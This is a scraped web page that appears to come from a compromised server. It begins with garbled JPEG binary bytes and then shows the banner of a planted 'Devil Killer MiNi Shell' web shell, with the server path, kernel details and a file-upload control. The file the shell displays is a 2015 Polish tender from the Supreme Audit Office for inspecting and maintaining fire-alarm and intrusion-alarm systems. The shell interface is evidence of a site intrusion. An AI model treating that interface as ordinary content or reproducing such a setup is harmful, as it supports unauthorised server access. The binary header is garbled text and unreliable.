JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150728/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150728/112351-N-2015.html

<p class="kh_header"><b>Warszawa: Przeglądy techniczne i konserwacje elektronicznych systemów bezpieczeństwa</b><br>
<b>Numer ogłoszenia: 112351 - 2015; data zamieszczenia: 28.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Najwyższa Izba Kontroli , ul. Filtrowa 57, 02-056 Warszawa, woj. mazowieckie, tel. 022 4445000, faks 022 4445415, 4445410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nik.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeglądy techniczne i konserwacje elektronicznych systemów bezpieczeństwa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług dotyczących przeglądów technicznych i konserwacji elektronicznych systemów bezpieczeństwa.<br>
2. Zamawiający dzieli przedmiot zamówienia na dwie części, tj.:<br>
Część I - przeglądy techniczne, konserwacje instalacji i urządzeń elektronicznych systemów bezpieczeństwa znajdujących się w budynku biurowym A Najwyższej Izby Kontroli w Warszawie przy ul. Filtrowej 57.<br>
 a. systemu technicznego zabezpieczenia przeciwpożarowego w budynku biurowym o powierzchni użytkowej ok. 16.000 m,2 w tym systemu sygnalizacji pożaru AlgoRex  wraz z układami oddymiania oraz układami wykonawczymi takimi jak centrale i trzymacze drzwiowe, centrale oddymiania, siłowniki i klapy oddymiające oraz elementy oddzieleń przeciwpożarowych będących urządzeniami przeciwpożarowymi, dźwiękowego systemu ostrzegawczego (DSO), instalacji oświetlenia awaryjnego i ewakuacyjnego,<br>
b.	systemu sygnalizacji włamania i napadu CS 440,<br>
c.	systemu kontroli nadrzędnej LMS.<br>
3. Termin wykonania zamówienia: od dnia 1 stycznia 2016 r. do dnia 31 grudnia 2018 roku.<br>
4. Część II - przeglądy techniczne, konserwacje urządzeń systemu technicznego zabezpieczenia przeciwpożarowego znajdujących się w budynku biurowym B Najwyższej Izby Kontroli w Warszawie przy ul. Krzywickiego 9 o powierzchni użytkowej ok. 7.000 m2, tj. systemu sygnalizacji pożaru IQ8 firmy Esser, klap odymiających oraz elementów oddzieleń przeciwpożarowych będących urządzeniami przeciwpożarowymi, dźwiękowego systemu ostrzegawczego (DSO), instalacji oświetlenia awaryjnego i ewakuacyjnego.<br>
5. Termin wykonania zamówienia: od dnia 16 września 2015 r. do dnia 31 grudnia 2018 r. z wyjątkiem dźwiękowego systemu ostrzegawczego (DSO) od dnia 13 grudnia 2015 r. do dnia 31 grudnia 2018 r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.71.10.00-2, 50.70.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wpłata wadium nie jest wymagana</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy posiadający uprawnienia na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia określone w ustawie z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2014 r., poz. 1099).<br>
Ocena spełniania warunku dla części I i II zamówienia nastąpi według formuły spełnia-nie spełnia na podstawie dostarczonych wraz z ofertą:<br>
1. koncesji wydanej przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, zgodnie z art. 15 ust. 1 ustawy o ochronie osób i mienia<br>
2. oświadczenia o spełnieniu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U z 2013 r., poz. 907), dalej oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy<br>
1. Dla części I zamówienia:<br>
- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie wykonali lub wykonują co najmniej 1 zamówienie polegające na świadczeniu usług w zakresie przeglądów technicznych lub konserwacji :<br>
1) systemu sygnalizacji pożaru Algorex firm Cerberus, Siemens,<br>
2) urządzeń wchodzących w skład dźwiękowego systemu ostrzegawczego DSO firmy Ultrak Security Systems,<br>
3) urządzeń systemu klap dymowych w kanałach wentylacyjnych firmy Mercor,<br>
4) urządzeń i instalacji oddymiania dróg ewakuacyjnych, opartego na systemie firm Mercor i D + H Mechatronic,<br>
5) systemu sygnalizacji włamania i napadu CS 440 firm Cerberus, Siemens,<br>
Przeglądy techniczne lub konserwacje określone w pkt 1-5) nie musiały być/nie muszą być świadczone w ramach jednego zamówienia.<br>
2. Dla części II zamówienia:
- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie wykonali lub wykonują co najmniej 1 zamówienie polegające na świadczeniu usług w zakresie przeglądów technicznych lub konserwacji:<br>
1) systemu sygnalizacji pożaru IQ8 firmy Esser,<br>
2) urządzeń wchodzących w skład dźwiękowego systemu ostrzegawczego DSO firmy Ambient Systems,<br>
3) urządzeń klap dymowych w kanałach wentylacyjnych firmy Mercor,<br>
4) urządzeń i instalacji oddymiania dróg ewakuacyjnych, opartego na systemie firmy D + H Mechatronic.<br>
Przeglądy techniczne i konserwacje określone w pkt 1-4) nie musiały być/nie muszą być świadczone w ramach jednego zamówienia.<br>
Ocena spełniania warunku dla części I i II zamówienia nastąpi według formuły spełnia-nie spełnia na podstawie dostarczonych wraz z ofertą:<br>
1. wykazu wraz z dowodami, o których mowa w sekcji  III.4.1).<br>
2. oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br>
Ocena spełniania warunku dla części I i II zamówienia nastąpi według formuły spełnia-nie spełnia na podstawie dostarczonego wraz z ofertą oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą sie ubiegać Wykonawcy, którzy:
1. Dla części I zamówienia - dysponują:<br>
1) co najmniej 1 osoba posiadająca aktualne świadectwo kwalifikacji o specjalności eksploatacja i pomiary urządzeń, instalacji i sieci energetycznych  do 1 kV lub powyżej 1 kV na stanowisku eksploatacji E wydane zgodnie z rozporządzeniem Ministra gospodarki, pracy i polityki społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828 z późn. zm.) lub w przypadku obywateli Unii Europejskiej, którzy nabyli w tych państwach wymagane kwalifikacje w zakresie eksploatacji urządzeń, instalacji i sieci na stanowisku eksploatacji wg przepisów ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U.z 2014 r., poz. 436 z późn. zm.),<br>
2) co najmniej 1 osoba posiadająca aktualne świadectwo kwalifikacji o specjalności eksploatacja i pomiary urządzeń, instalacji i sieci energetycznych  do 1 kV lub powyżej 1 kV na stanowisku dozoru D wydane zgodnie z rozporządzeniem Ministra gospodarki, pracy i polityki społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828 z późn. zm.) lub w przypadku obywateli Unii Europejskiej, którzy nabyli w tych państwach wymagane kwalifikacje w zakresie eksploatacji urządzeń, instalacji i sieci na stanowisku eksploatacji wg przepisów ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U.z 2014 r., poz. 436 z późn. zm.)
3) co najmniej 2 osobami posiadającymi aktualną legitymację kwalifikowanego pracownika zabezpieczenia technicznego  wystawioną przez Wykonawcę, o której mowa w art. 20 ust.1 pkt 3 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia  (Dz. U. z 2014 r., poz. 1099),<br>
4) co najmniej 2 osobami, w tym każda z nich posiadająca ważny dokument:<br>
a) wystawiony przez firmę Cerberus lub Siemens potwierdzający, że osoba posiada  uprawnienia do wykonywania przeglądów technicznych lub konserwacji central pożarowych systemu sygnalizacji pożaru AlgoRex oraz central CS 440 wchodzących w skład systemu sygnalizacji i napadu,<br>
5) co najmniej osobą posiadającą ważny dokument:<br>
a) wystawiony przez firmę Mercoc potwierdzający, że osoba posiada uprawnienia do wykonywania przeglądów technicznych lub konserwacji systemu oddymiania dróg ewakuacyjnych i klap dymowych,<br>
b) wystawiony przez firmę D+H Mechatronic potwierdzający, że osoba posiada uprawnienia do wykonywania przeglądów technicznych lub konserwacji systemu oddymiania dróg ewakuacyjnych,<br>
c) wystawiony przez firmę Ultrak Security Systems potwierdzający, że osoba posiada uprawnienia do wykonywania przeglądów technicznych lub konserwacji urządzeń wchodzących w skład dźwiękowego systemu ostrzegawczego DSO.<br>
2.  Dla części II zamówienia - dysponują:<br>
1) co najmniej 1 osoba posiadająca aktualne świadectwo kwalifikacji o specjalności eksploatacja i pomiary urządzeń, instalacji i sieci energetycznych  do 1 kV lub powyżej 1 kV na stanowisku eksploatacji E wydane zgodnie z rozporządzeniem Ministra gospodarki, pracy i polityki społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828 z późn. zm.) lub w przypadku obywateli Unii Europejskiej, którzy nabyli w tych państwach wymagane kwalifikacje w zakresie eksploatacji urządzeń, instalacji i sieci na stanowisku eksploatacji wg przepisów ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2014 r., poz. 436 z późn. zm.),<br>
2) co najmniej 1 osoba posiadająca aktualne świadectwo kwalifikacji o specjalności eksploatacja i pomiary urządzeń, instalacji i sieci energetycznych  do 1 kV lub powyżej 1 kV na stanowisku dozoru D wydane zgodnie z rozporządzeniem Ministra gospodarki, pracy i polityki społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828 z późn. zm.) lub w przypadku obywateli Unii Europejskiej, którzy nabyli w tych państwach wymagane kwalifikacje w zakresie eksploatacji urządzeń, instalacji i sieci na stanowisku eksploatacji wg przepisów ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U.z 2014 r., poz. 436 z późn. zm.)
3) co najmniej 2 osobami posiadającymi aktualną legitymację kwalifikowanego pracownika zabezpieczenia technicznego  wystawioną przez Wykonawcę o której mowa w art. 20 ust.1 pkt 3 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia  (Dz. U. z 2014 r., poz. 1099),<br>
4) co najmniej 2 osobami, w tym każda z nich posiadająca ważny dokument:<br>
a) wystawiony przez firmę Esser potwierdzający, że osoba posiada uprawnienia do wykonywania przeglądów technicznych lub konserwacji urządzeń systemu sygnalizacji pożaru firmy Esser,<br>
5) co najmniej 1 osoba posiadająca ważny dokument:<br>
a) wystawiony przez firmę Ambient Systems potwierdzający, że osoba posiada uprawnienia do wykonywania przeglądów technicznych urządzeń wchodzących w skład dźwiękowego systemu ostrzegawczego DSO firmy Ambient Systems,<br>
b) wystawiony przez firmę D + H Mechatronic potwierdzający, że osoba posiada uprawnienia do wykonywania przeglądów technicznych lub konserwacji urządzeń oddymiania dróg ewakuacyjnych,<br>
c) wystawiony przez firmę Mercor potwierdzający, że osoba posiada uprawnienia do wykonywania przeglądów technicznych lub konserwacji urządzeń klap dymowych.<br>
Ocena spełniania warunku dla części I i II zamówienia nastąpi według formuły spełnia-nie spełnia na podstawie dostarczonych wraz z ofertą:<br>
1. wykazu osób, o których mowa w sekcji III.4.1).<br>
2. oświadczenia.<br>
Zgodnie z zasadami określonymi we właściwych przepisach, Zamawiający dopuszcza także pełnienie ww. funkcji przez obywateli Unii Europejskiej, którzy nabyli w tych państwach wymagane kwalifikacje w zakresie eksploatacji urządzeń, instalacji i sieci na stanowisku eksploatacji wg przepisów ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2014 r., poz. 436 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br>
Ocena spełniania warunku dla części I i II zamówienia nastąpi według formuły spełnia-nie spełnia na podstawie dostarczonego wraz z ofertą oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca przy realizacji przedmiotu zamówienia będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia lub inny dokument, z którego takie zobowiązanie wynika (np. umowa, itp.).<br>
Podmioty udostępniające Wykonawcy zasoby w postaci wiedzy i doświadczenia traktowane są jako podmioty, które będą brały udział w realizacji zamówienia.<br>
2. Podmiot, który zobowiązał się do udostępnienia Wykonawcy zasobów, zgodnie z ww. pkt 1 odpowiada solidarnie z Wykonawcą za szkodę wyrządzoną Zamawiającemu powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br>
3. Pisemne zobowiązanie o którym mowa wyżej, musi być podpisane przez osobę / osoby uprawnioną/e do reprezentowania podmiotu użyczającego zasoby. Do oferty należy załączyć dokument, z którego takie upoważnienie będzie wynikało.<br>
4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane jest ustanowienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do oferty należy załączyć dokument ustanawiający pełnomocnika. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje również pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich kopii dokumentów załączonych do oferty.<br>
5. W przypadku umieszczenia przez Wykonawcę w ofercie informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, Wykonawca zobowiązany jest, na podstawie art. 8 ust. 3 ustawy, nie później niż do upływu terminu składania ofert do:<br>
1) zastrzeżenia, że nie mogą być one udostępniane oraz,<br>
2) wykazania, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy.<br>
6. Informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, które Wykonawca składa wraz z ofertą lub przekazuje Zamawiającemu na innej podstawie w toku prowadzonego postępowania, należy złożyć / zabezpieczyć (np. umieścić w osobnej zaklejonej kopercie opatrzonej stosownym opisem) w taki sposób, aby Zamawiający nie miał wątpliwości, że są to informacje zastrzeżone i nie mogą być one udostępniane innym podmiotom.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - czas reakcji Wykonawcy na otrzymane zgłoszenie obsługi awaryjnej - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla części I i II zamówienia.
1. Zamawiający przewiduje zmiany w zawartej Umowie w stosunku do treści oferty dotyczącej przedmiotu niniejszego zamówienia publicznego oraz terminu płatności i terminu realizacji Umowy w następujących przypadkach:<br>
1) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,<br>
2) uzasadnionych przyczyn technicznych lub funkcjonalnych powodujących konieczność zmiany sposobu wykonania umowy,<br>
3) konieczności zmiany terminu wykonania usługi spowodowanej podjęciem przez Zamawiającego decyzji  o przeprowadzeniu przez osobę trzecią kontroli jakości i sposobu prowadzenia usługi,<br>
4) zaistnienia siły wyższej,<br>
5) z przyczyn organizacyjnych ze strony Zamawiającego, w tym w strukturze organizacyjnej.<br>
